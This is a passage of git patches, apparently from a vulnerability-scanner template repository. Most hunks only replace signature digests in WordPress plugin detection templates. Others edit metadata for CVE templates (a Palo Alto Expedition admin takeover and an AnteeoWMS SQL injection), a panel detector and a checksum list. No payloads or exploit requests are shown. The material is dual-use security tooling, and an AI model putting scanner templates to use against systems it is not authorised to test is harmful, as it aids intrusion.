b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 7d48935b0e..ee74bde5db 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100da33cedb9c6d9e406f76eba676e25a32f2642668899447c2480489e320b3d54002206265d681daa7bd73968ab6da87e38267eb77e17fe4ed5ffe57c5c3f792abf001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007128526a663decf50a0afbe5cce22e1a3c2b51b083ce896da27b987f78e0ca4022063aca4420fcc8935e563bdb454bf6d04c748f12ecc74b186c185573ce01ecf22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index a020f1e78b..d593db3678 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f0e7de8a089633d320581b6b410fe70db1b08d72a409f2dacf486fb27b4ab27c0220703c71ed28cfea3eadddab023cd6810edd6863a8729712fdd5903e085f67f767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b899facd590dd2eafc87b9f22f9ee1412cd9140ba4450faf1c116fb4ae25f2b022044fe5eeb5105e3f532497783b6b1235c2335b159c9d0bbf8c849d956854bf1ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bd60bbc937..713c1b5fb9 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ec80b42d17f40983f70eb365a031eed09c3d54e0f469e820ced57feb9992f56a022064b8b076b329ed61f86b07ac8234aa63ab4baf875c74eecfbd9aa5fe3112eefa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200582347e51ce859658dffd24b2675b958e63acb4a389875b13a6f24cf5e0842c022100cb3020133e9c1b65914db8814730b03de21d1a9dc43f97d00d61b93b20aaa896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 5db71abfcf..a6bfca574b 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206ffed1308dc3ab653895e948ef0bd1435421aedd6117e17fc41678ff3ed49af3022100d2d8be53fa42ea29823a06ac745a3e5ff25486ccfca39f0ecd7d25c7262790b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f1914836392544d4a1cd7ba30af3785ac7edcdb566bd73a543187c5e9e435ad02203746cee9f3d3c70e75660a628ab62f3b73e9363cef9c94934d46408862baf594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index baad513d3d..abf10210e5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210096276020eeffb95a516f72034adb524eb4f2aac8f33089aff82ec4c33974c4c2022100e75cd6e737188f7e66723675997e40669860a48356fd515495903e02fd75d4ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb2aebb90621f92bb2bd39e82455895e769e0bf188815d76d66955cce04b0c20022100ba630b1f9b8817f34ca6967d5e16430f29b15df37445ed190cac8af9666723c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 81c605533b..2f67d3665b 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220123cd1b1cbed1050db6af1c3fb44ab9e16df36f0339e2dca8ccbc58a6c7c6214022100abfc2652d3623bdd8f3042c25b3d7e4d34ca0033081ded467ef6a41bb620b918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0152aaa5402c4f62fbc5dbd4bec74072961924b258663bd5d703594a618abd902210087ca17804d5d11ad17483a435a31dc26082cef3393e8660d23fdf6fcd8eb8d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 13d13e6b29..165b92fea8 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fe118e2aaf688cd1694a0e9183966be78183d0ac395f3544166b143663def1e3022100de60e7ee945f3eeb9d81f5688c87967de34e832c91a53e06cd2370af97f40c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009124189aedc3f1da5af94cf03b7479f39b39786dab06fa9dccc76b804c197799022100b5c588d54aa502b4df04c3aea9d8a5f27a920b63feb2781f03d0db8cd11f1e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 3d94a5caf1..28326921c2 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dca12b84d67bf1d4532a6997d2e84651faf5c934006527cb0067e6c5b4e24c0f022066b483da585e611a0f4a407920897a4d69e623f115e36e344aad31505609fae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b3eb6f014302074cfba93d23ce2943dd11017865a8995fa20aee648c0c32a36022074ee0b0d1681ac09ae23d9f79dbe016aa327fbe56d1ee136e7be35ba8328d256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 5eb1be6fdd..94b55f4519 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e2dee904b25c3a412451e889c0ccd5260b4ec318ecbeeb599f100c7baa6e798f02206b6320cbcfeadda1a47125575e6151974178976cc786512726ae26a560630706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f628362f3ab11923bfc049bb49d9c904321db82da1cb40fa4a52b3cf360d27402206b4390c5e6a25d0d650e9e230029a13e9291826d753c18f0ac9273a2ef4ff05b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d5abe4f2ca..ea7356c552 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022019120c9fcb41549aa75defc5da23d8682871ed0ec937601f2722313cd0271579022100bf96b1028ca7da849f8e60207b1e196278fdbe471a8cac4c0ac0e6df1ba2e5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c170f3becec7c6307e6a2ced2d02b071b1e1a1b6458d34daf099547c26845a3022100d53f9987daefa97ea3c40c21bc2832001049e8ffe3813bd712ef59185bbd4b49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 2fa645e8a9..ccc202b9d5 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202f427a2f3fa83ca7729e42241e9ae7b5489536b9f59acb934f1b39aee4e8eb360221009960d2f808e76d58efda81740d48b9fc0d0b4e4afc5b52cfe70ffe4f746e82ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008bdcd687c45935db9ef350ad990e7dc2a72b1f4617c3bda7e953193a6545eaf30221009f1d9c79fc553b89d6ed91c4358febf76aa6cc4cad74533c716619a92964d4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index b22aec906f..759fbdd35c 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fc18c4003059386ab94946692b202392ce60edf0642c444b767e985e91ccc086022100e99c6873da50416eb46811027a8045ff7df0c3a5db3642aa274e44f624843b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cdd0cbf339975d26a5158995e243e841c0a3d9fa716c50272bbaba70caa744002200ef17f0b25c14be843860c260b44cbdbf55687954dfc0319be1b5f7f555987e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c7f1395cde..24adbef73a 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022003af21c7a52570a50f00f15a7dde081616246e908aa98895061e5fe9a5a799b802204eceee0ba05b7ccc8ab78fb3d953d432b571ac08d5a9873faf304361d3f161a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074a587e30fdd1160a39899a53cea25cc85877f6707018beea39ec1a6e4f7d73102206b3970dbe1a3eeb36c71b80351fb0834cec5dfdc805fb53dbdef97d6a909303a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 79058c50f2..2f1ededa4c 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100965c827948222ba9d1db8051f485622cfcdb8ff94f622d8c083bfc7bd859b710022073507598dd8d447d83ddb58d4b220dd54d36ee2e463bef299341e1a9b86d34a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ebc65da1a3998fdcac0a0e33bf1df88e4a0f72e0598a311e6ba779e81f6e33c8022100a1f8458c4a15e63d73103189ca8dd679c2e95b2037f8a4c3326410477a3d5288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 39cf0e1629..be548d442b 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d9dddc7b642dd49f50206e634785d3072a0856be4337fa50201a1a49609718fc022021321e62370a9ff64148c804a5b1b013c6d6b5d19609fcdc5f7b2b51b69e4772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba551ab9bb9ee0d80a005473791ce10ecd5df8b8958d86a56f961aa7b05397e2022100b63e1eb792f90521593b3c5db6452532024f0f1602222edd3fe6d45ab16bcb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 5181bef5cd..81ca273787 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fe0cdbd3b33666227b7fb6b9f29bb869ceca49d0de976364f2f5008585d66b51022077b4bd6c79d53cb929a58e073e4a162b03f1dadd237b83c82b18e689860a5cda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e67911787b029db15b360654650e817697a10d3b110e1c538c9c9e2eeee78fc0220369f08e99545a5c26442994d39ad944492031878267896d0d82d16a42e21ac6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 4db4b8f778..e7656bc887 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022018b58cb3ee39d9281b33761442322be0505762bfc2b03f3819ba348457ad170e0220272b029dcf3a2dfe7a8a058e1041f4ff7552dfe68f38a6aa85482dfa3ab05a83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205735990fc2e7c35fdfac516d5f08258a0175ab8e0d9011bacf956ed536a88de8022100f90149495d57de6e482fd856f9b0ebf3fc8655817fba5c33cb1ee7b3fa8e8637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index e0afa816b9..33d9287b26 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204e9baf848426ae46b436cfeae9b828fc5d3bb53639f2fe134decea1941cd620d022100c37a157aa679b5107ecbc75e0244a8e56cb38a110778ebf1ab16465245a71777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032aee27de9fc78ede4ef48d2137a2e148b2958606427d763f1e3183e70f6707c022070484e754813b0381c24c23a44545030662222604588fb4078e23339fb38d267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index f36b4efcb3..1a188ea92c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207640d856db1a5521a537459fe4a95134048ff5a1d82a1cc782ca3809759a600b022100fbbd1a6e997898dc794a63a020f9f3d94a2548efdc96f39806dec69bf650fa61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066ee180d9b2778367f5c6d42552c4ac4295239681d62b5c13a7d0cf56ca72123022100c9159d99b65b848f9d4e557dfccca38646cfde0dca0215e4f5370f2dd3e0343c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 5d1dfbd7d4..2195aac22c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210082d3ce9eb64f5c07f912fcf894cb8d9bb636fd214f507b4986c320239b124018022100bc6d6e9cb42a279eeb688d8e17455538a4a29fbf0714a8094760ba0cd1042055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082e1c130db157b3821973fd5c3b5e19dc02fc6076ff7c6f7e2a081c51515a585022100b15a473a5162539b6d4513ed36642fffa48e6b209c7799ff64cdb79acb15a80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 9399808ecf..fa87a43aa6 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201743e468714148c59765aa4b65436dc514ce387c2d8050362a06e38b5a808294022100d7df317db86df8ae43da68d24e52741b80808c3b8c8b14bf1f074c01c7738bde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae0c0144697876237451b8212b6b02543d9896ee91b939f28e077f434fece58e0220065b1a4f94497664b8db2c66e4f109b8f18f8bee00af82b962fe3d0ccaa65d62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 2c7e31d497..f0ab121401 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100acfc36e50dd0950c517e3df46b5cf6a2ebab302b419f76f5e1519cdb12e6e7cc02206d7decc4ded9be1c48750f169f1faa44ef9ca16483a9394e56e502f3f5cead04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090bc8ead4b473fa306dc1a0b86791b6fea78cad5fcc56ed5d68c6eaa74e0c8ec022100936f820bc8c9a0d8a8839e715fb7cb0d9058565cff43921d366c887580361ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 164b78812d..da0564955c 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022071e288db5dbfee6cf302b2ae133be0e18e609f3172a207231228e73e4e72de1a0221008392fd9252d305a977ec9c2e6c89c2448333ee299a8444be81698777954f78ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205088ee4fba5034f0ddfcdced33b1eb9d0ef47da32e033241cffd254b34f1b888022100f40a6dde29bb0282f78165ff64c5ff8c2f8a41d6ef0c90dd8b36351b6e2e243b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index de4718027a..2673920575 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008fd036fb26a175598f129d04282e4d7d94111ed0dbc17587d2c70dfbb6bcdffb022076106d656eb3542ef9ff6b7a795b459788232e7305255543407be9788ed26a51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d47b17eabdf6b4cc0aa6f22ea9f1a3362f270e8589d50148a861e29a16d80396022026cb84f13adb5ef1cd45ef93b820a84a4df3249b6aa10ee7fd90a9993636d832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/default-logins/ssh-default-logins.yaml b/javascript/default-logins/ssh-default-logins.yaml index d93c2b607a..26e220672c 100644 --- a/javascript/default-logins/ssh-default-logins.yaml +++ b/javascript/default-logins/ssh-default-logins.yaml @@ -37,4 +37,4 @@ javascript: - "response == true" - "success == true" condition: and -# digest: 4a0a00473045022014aa9c1a1b17b3914b4ba3f3233452eebae9a55538d97c0e80eda65e1d207f4d022100bb2595041170eae66cc6dd5fcbf9b33a0b3d61a92fe5a77c1aa48a600f8f420c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202eb00e63616489fb9a255de039962d3402de7ef678ca580077862d141342f564022100e2c13d61d14bbc933504768a35c1dd557dccdac5b21dc17356a6c19eeb80ffe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ebbbbc55a3244c7d8189c016a3e41c4bc9ac0362 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:30:37 +0400 Subject: [PATCH 082/218] Update CVE-2024-5910.yaml --- http/cves/2024/CVE-2024-5910.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index 0b4489bd7f..adaf799ab6 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -1,19 +1,23 @@ id: CVE-2024-5910 info: - name: Palo Alto Expedition - Missing Authentication Leads to Admin Account Takeover + name: Palo Alto Expedition - Admin Account Takeover author: johnk3r severity: critical description: | Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition. - reference: |- - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise - https://security.paloaltonetworks.com/CVE-2024-5910 + reference: + - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise + - https://security.paloaltonetworks.com/CVE-2024-5910 + - https://nvd.nist.gov/vuln/detail/CVE-2024-5910 classification: + cve-id: CVE-2024-5910 + cvss-score: 9.3 + cwe-id: CWE-306 epss-score: 0.00043 epss-percentile: 0.10397 metadata: - verified: "true" + verified: true max-request: 1 vendor: paloaltonetworks product: expedition From 1662f5bed86dcc408c26a322907d4f3ec9fcd6a9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:31:27 +0400 Subject: [PATCH 083/218] Update paloalto-expedition-panel.yaml --- http/exposed-panels/paloalto-expedition-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/paloalto-expedition-panel.yaml b/http/exposed-panels/paloalto-expedition-panel.yaml index d25aad5254..e138d38677 100644 --- a/http/exposed-panels/paloalto-expedition-panel.yaml +++ b/http/exposed-panels/paloalto-expedition-panel.yaml @@ -1,18 +1,18 @@ id: paloalto-expedition-panel info: - name: Palo Alto Expedition Project Login - Panel + name: Palo Alto Expedition Project Login - Detect author: johnk3r severity: info description: | Palo Alto Expedition Project login panel was detected. metadata: - verified: "true" + verified: true max-request: 1 vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 - tags: panel,expedition,palo-alto,login + tags: panel,expedition,palo-alto,login,detect http: - method: GET From b5dc99883c1792ac6414980462593082f214f3b0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:32:19 +0400 Subject: [PATCH 084/218] Update CVE-2024-44349.yaml --- http/cves/2024/CVE-2024-44349.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-44349.yaml b/http/cves/2024/CVE-2024-44349.yaml index b555d0debb..22953fdc18 100644 --- a/http/cves/2024/CVE-2024-44349.yaml +++ b/http/cves/2024/CVE-2024-44349.yaml @@ -1,13 +1,14 @@ id: CVE-2024-44349 info: - name: AnteeoWMS < v4.7.34 - Unauthenticated SQL Injection + name: AnteeoWMS < v4.7.34 - SQL Injection author: iamnoooob,rootxharsh,pdresearch severity: critical description: | A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB. reference: - https://blog.cybergon.com/posts/cve-2024-44349/ + - http://nvd.nist.gov/vuln/detail/CVE-2024-44349 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 From 7c52aaf0141fc354a6c6f7a30b1bc3c7ba084968 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:33:26 +0000 Subject: [PATCH 085/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6b9bc90edc..58832b3379 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2024/CVE-2024-39713.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml http/technologies/mirth-connect-detect.yaml From 4f04fd763a589898fbea134ddf53c26916e1e4c3 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:33:30 +0000 Subject: [PATCH 086/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 411 +++++++++++++++++++++-------------------- 1 file changed, 206 insertions(+), 205 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 373b16c533..fe22cbe66b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1433,7 +1433,7 @@ http/cves/2013/CVE-2013-4625.yaml:889425384d1791c8d64f2a01c5073faa8e752636 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea http/cves/2013/CVE-2013-5979.yaml:c1439b35c3ea1ab4d7f5ed19ccc670b75094c431 http/cves/2013/CVE-2013-6281.yaml:a8aca0c3a8f4ca7f993970d911143adde9144d8e -http/cves/2013/CVE-2013-7091.yaml:231410488a8e5715b96abd8723a8b1445d3a895e +http/cves/2013/CVE-2013-7091.yaml:2bf2414c9c9b7d1c142b93c111f5a62555b53e97 http/cves/2013/CVE-2013-7240.yaml:4ff6b9c5fc7d8c94d20690a220d7618948a20b86 http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 @@ -3793,6 +3793,7 @@ http/cves/2024/CVE-2024-38816.yaml:cf17b066ee186ae8cc82497e855712e3e6099857 http/cves/2024/CVE-2024-38856.yaml:90c859e0070d75465164d17caf1877524b5fe5bd http/cves/2024/CVE-2024-3922.yaml:c398c48b2696b36644cbd03105f97157a7b4b56c http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 +http/cves/2024/CVE-2024-39713.yaml:ec2d13209d3e935071a33360f8160b0595463e0a http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 http/cves/2024/CVE-2024-39907.yaml:c889ebd6022e4628332195c34c27b3deb48de3f5 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf @@ -5137,7 +5138,7 @@ http/exposed-panels/toshiba/topaccess-panel.yaml:f18dd04653999ce3f0744d4e9540a8e http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4fb417b3d49a http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b http/exposed-panels/tplink/tplink-r470t-panel.yaml:80f1bd596c3ae984132e2848c486a0ba4050dc4e -http/exposed-panels/traccar-panel.yaml:75c24c75cc871220e2485edac6dc0ece7ab25f8d +http/exposed-panels/traccar-panel.yaml:52e4a04039deaa7facd491dcaa941d4b45293642 